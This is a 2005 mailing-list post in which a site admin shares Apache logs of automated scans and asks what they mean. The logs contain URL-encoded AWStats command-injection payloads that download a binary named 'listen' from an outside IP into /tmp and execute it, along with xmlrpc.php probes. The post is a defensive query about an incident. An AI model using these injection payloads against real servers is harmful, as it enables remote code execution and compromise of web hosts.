Hi
Recently I've been getting a bigger then normal amount of port 80
designated attacks. What's wondering is that most of these look much
alike, like it was some kind of script/program for scanning. Anybody
else is getting those? what is it?
Below are the logs from apache:
81.208.19.149 - - [22/Nov/2005:22:10:31 +0100] "GET
/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|
HTTP/1.1" 404 317
81.208.19.149 - - [22/Nov/2005:22:10:32 +0100] "GET
/cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|
HTTP/1.1" 404 317
81.208.19.149 - - [22/Nov/2005:22:10:36 +0100] "GET
/cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|
HTTP/1.1" 404 325
81.208.19.149 - - [22/Nov/2005:22:10:37 +0100] "POST /xmlrpc.php
HTTP/1.1" 404 309
81.208.19.149 - - [22/Nov/2005:22:10:39 +0100] "POST /blog/xmlrpc.php
HTTP/1.1" 404 314
81.208.19.149 - - [22/Nov/2005:22:10:40 +0100] "POST
/blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 321
81.208.19.149 - - [22/Nov/2005:22:10:44 +0100] "POST
/blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 322
81.208.19.149 - - [22/Nov/2005:22:10:48 +0100] "POST /drupal/xmlrpc.php
HTTP/1.1" 404 316
81.208.19.149 - - [22/Nov/2005:22:10:50 +0100] "POST
/phpgroupware/xmlrpc.php HTTP/1.1" 404 322
81.208.19.149 - - [22/Nov/2005:22:10:54 +0100] "POST
/wordpress/xmlrpc.php HTTP/1.1" 404 319
81.208.19.149 - - [22/Nov/2005:22:10:56 +0100] "POST /xmlrpc.php
HTTP/1.1" 404 309
81.208.19.149 - - [22/Nov/2005:22:10:57 +0100] "POST /xmlrpc/xmlrpc.php
HTTP/1.1" 404 316
What exactly is this for? looking for the xmlrpc.php, is it some file
with a known exploit to it or such?
and furthermore, this here:
/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|
/cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|
/cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|
this is as far as I can understand, a vulnerability that allows one to
execute shell commands with the privileges of the apache user, nice..
--
Best wishes
Łukasz Hejnak
--
http://linuxfromscratch.org/mailman/listinfo/lfs-security
FAQ: http://www.linuxfromscratch.org/faq/
Unsubscribe: See the above information page
